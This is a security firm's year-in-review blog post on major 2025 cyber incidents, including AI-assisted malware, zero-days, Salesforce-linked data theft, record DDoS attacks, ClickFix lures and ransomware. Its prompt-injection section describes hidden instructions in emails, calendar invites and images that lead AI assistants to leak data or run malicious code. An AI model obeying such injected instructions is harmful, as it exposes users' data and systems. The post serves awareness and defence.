2025 was a pivotal year for cybersecurity. It was marked by high-impact cyberattacks, massive data breaches, threat groups gaining unprecedented notoriety, and zero-day vulnerabilities Exploited in real attacks.
At TecnetOne, we closely monitored these incidents because they reflect the real risks that companies of all sizes and industries face today. Some cases went relatively unnoticed, but others drew the attention of organizations, IT teams, and security leaders due to their scale and consequences.
In this article, we look back at the cybersecurity topics that stood out in 2025, along with a clear and direct summary of each. They are not listed in any particular order, but they all share one thing in common: they left key lessons about how digital threats are evolving and why having a strong cybersecurity strategy is no longer optional.
1. AI-Driven Attacks
If there was one trend that marked a turning point in 2025, it was the use of artificial intelligence (AI) by attackers. What was once experimental became a common tool for automating intrusions, creating more adaptable malware, and scaling attacks at high speed.
Threat groups began leveraging advanced language models to write malicious code, enhance evasion techniques, and optimize every phase of the attack. The result was a noticeable increase in the speed and volume of malicious campaigns.
New malware families were detected, capable of adapting their behavior based on the victim's environment, allowing them to remain undetected for longer. Large-scale attacks also emerged, demonstrating how AI can be used to automate tasks like target reconnaissance and credential theft on a massive scale.
There were even proof-of-concept ransomware strains using AI to assist with file encryption, data exfiltration, and the execution of complex attacks with minimal human involvement.
But AI wasn’t just used to create malware. It also began accelerating vulnerability exploitation, drastically reducing the time and technical knowledge required to launch an attack. Automated tools enabled the analysis and exploitation of known flaws in minutes.
By the end of 2025, the message was clear: AI was no longer a future promise for attackers—it had become a real accelerator of cybercrime, lowering the barrier to entry and making attacks faster, smarter, and harder to stop.
2. Zero-Day Attacks: The Perfect Entry Point
In 2025, zero-day vulnerabilities remained one of attackers' favorite tools for infiltrating corporate networks. These flaws, exploited before a patch exists, played a key role in data theft campaigns, digital espionage, and ransomware attacks.
Top targets included network edge devices and services exposed to the internet, as they form the first line between the outside world and a company’s internal systems. When these systems fail, access is often direct and silent.
Throughout the year, zero-day vulnerabilities in widely used technologies were actively exploited, including firewalls, VPN gateways, and remote access platforms. Critical business services were also affected, enabling attackers to install backdoors, steal sensitive data, and remain within networks for extended periods undetected.
One of the most notable cases involved Microsoft SharePoint, which became a prime target. One of its most exploited vulnerabilities allowed various threat actors—including ransomware groups—to deploy web shells, extract confidential information, and establish persistence in corporate environments.
Additionally, the Windows operating system was once again in the spotlight, with flaws exploited in everyday components like shortcuts and registry services. Even popular day-to-day tools, such as file compression software, were used as attack vectors through phishing campaigns designed to bypass security controls.
The takeaway was clear: any exposed software can become an entry point if not properly managed.
3. Data Theft Attacks Linked to Salesforce
In 2025, Salesforce became a recurring target of data theft and extortion campaigns—not due to direct platform flaws, but due to compromised accounts, stolen OAuth tokens, and integrated SaaS applications. Many of the incidents were linked to the ShinyHunters group, which attacked companies across multiple sectors and pressured victims via their own data leak site.
ShinyHunters Leak Site
The main attack vector was the digital supply chain: attackers compromised SaaS tools connected to Salesforce, stole credentials and tokens, and gained access to multiple environments, affecting even major tech and cybersecurity companies. The lesson was clear: protecting a SaaS environment involves much more than securing the core platform—it requires controlling access, auditing integrations, and closely monitoring all third-party providers.
Read more: How to Stay Safe from Cyberattacks in 2026: A Business Guide
4. Prompt Injection: A New Threat to Artificial Intelligence
As artificial intelligence became integrated into nearly every productivity tool, browser, and development environment in 2025, a new category of attacks emerged that caught even experts off guard: prompt injection.
Unlike traditional vulnerabilities, this type of attack doesn't exploit flaws in code. Instead, it takes advantage of how AI models interpret instructions. Through carefully crafted inputs—sometimes visible, sometimes completely hidden—attackers are able to alter the AI’s behavior, bypass security controls, or force it to carry out unintended actions.
Several high-impact cases documented in 2025 revealed the true scope of the problem. Information leaks were discovered in productivity assistants without any user interaction, vulnerabilities in automatic email summaries and calendar invitations facilitated phishing attacks, and programming assistants were manipulated into suggesting or executing malicious code.
More sophisticated attacks were even detected hiding instructions inside seemingly harmless images. Though invisible to the human eye, these messages were perfectly interpreted by AI systems, opening up a new front in intelligent model security.
The message was clear: AI must not only be powerful—it must be secure. And 2025 made it evident that protecting these systems will be one of the major challenges in the years to come.
5. DDoS Attacks Reach Unprecedented Levels
In 2025, distributed denial-of-service (DDoS) attacks shattered all known records. Organizations worldwide were targeted by increasingly powerful offensives capable of taking down critical services within minutes.
Throughout the year, multiple large-scale attacks demonstrated just how far the “firepower” of these campaigns has evolved. Some reached peaks of several terabits per second, far exceeding what was recently considered an extreme attack.
Much of this growth is attributed to Aisuru, a botnet that emerged as one of the main forces behind the largest DDoS attacks ever recorded. In one of the most notable cases, hundreds of thousands of IP addresses were used to flood large-scale cloud infrastructure, proving that even the most robust environments can be put to the test.
In response, international authorities began taking stronger action. Over the past two years—and especially during 2025—coordinated operations were carried out to dismantle “DDoS-for-hire” services, leading to the arrest of administrators running these criminal platforms. An important step, though still insufficient against a threat that continues to grow.
Chart of Aisuru's Record-Breaking Attack Source: Cloudflare
Read more: 29.7 Tbps DDoS Attack with Aisuru Botnet: New World Record
6. ClickFix: The Social Engineering Tactic That Tricked Thousands
Another major player in 2025 was the social engineering attack known as ClickFix. This technique was quickly adopted by a wide range of malicious actors—from state-sponsored groups to ransomware gangs.
What began as a Windows-targeted campaign soon expanded to macOS and Linux, infecting systems with information stealers, unauthorized remote access tools, and various forms of malware.
The method is as simple as it is effective. Victims are directed to a website that simulates a technical issue: a system error, a fake security alert, a suspicious CAPTCHA, or a supposed pending update. The “solution” appears legitimate, but in reality, it instructs the user to execute commands in PowerShell or the terminal.
ClickFix attack displaying a fake windows update screen
By following the instructions, users ended up unknowingly installing the malware themselves. These campaigns relied on all kinds of convincing lures: fake Windows Update screens, misleading software activation videos on TikTok, or bogus CAPTCHAs with step-by-step instructions. The result was clear—thousands of compromised systems caused by users trusting what seemed like a routine action.
Once again, 2025 delivered a critical lesson: the weakest link is still the human factor, and user awareness is just as important as any technological solution.
7. The Ransomware Attack on Ingram Micro
In 2025, Ingram Micro (one of the world’s largest technology distributors) suffered a ransomware attack that led to a sudden disruption of its systems. Its website and online ordering platform went offline without warning, affecting thousands of businesses that rely on its services.
Over the following hours, it was confirmed that the incident was linked to SafePay, one of the most active ransomware groups of the year. The attack began abruptly, and several employees found ransom notes on their devices, prompting the company to disconnect internal systems as a containment measure.
Although the attackers claimed to have stolen data, such statements are often part of their pressure tactics. As of now, there has been no public confirmation of a massive data leak or the true extent of the encryption.
The Ingram Micro case exposed a critical issue: when a key player in the tech supply chain is attacked, the impact ripples far beyond the affected organization.
8. The Hacking of the Hermosillo Municipal Police
One of the most sensitive incidents of the year occurred in Hermosillo, Sonora, following a cyberattack on the Municipal Police, attributed to the group Chronus Team. The breach sparked serious concern due to the massive leak of sensitive information related to over 1,200 municipal officers.
The incident came to light when a 738 MB file began circulating, containing personal data, photographs, information about weapons, and details on the operational structure of the police force. Although some of the information may not be recent, its public exposure represents a real risk to the safety of officers and the institution.
Due to the volume and sensitivity of the compromised data, this attack became one of the most significant cyber incidents targeting municipal infrastructure in the past year. The case delivered a clear message to the public sector: cybersecurity is no longer optional, and having robust protection, monitoring, and incident response strategies is crucial to prevent greater consequences.
Learn more about this incident: Hermosillo Hacked: Chronus Team Leaks Municipal Police Data
Conclusion: Key Lessons from the 2025 Cyberattacks
The cybersecurity incidents of 2025 made one thing clear: no organization is completely safe. Private companies, technology providers, and public entities were all affected, showing that the impact of a cyberattack goes beyond technical damage—it also hits operations, reputation, and trust.
One of the most important takeaways was the vulnerability of the digital supply chain. Attacks on key providers and platforms revealed how a single breach can affect multiple organizations at once. This came alongside the rise of ransomware, the exploitation of zero-day vulnerabilities, and increasingly effective social engineering techniques.
It also became clear that prevention must be paired with detection and response. Security tools alone aren’t enough; continuous monitoring, proper access management, and user training to recognize threats are essential before it’s too late.
At TecnetOne, these cases underscore the importance of having a comprehensive cybersecurity strategy—one that helps companies reduce risk, respond quickly to incidents, and continuously protect their critical information.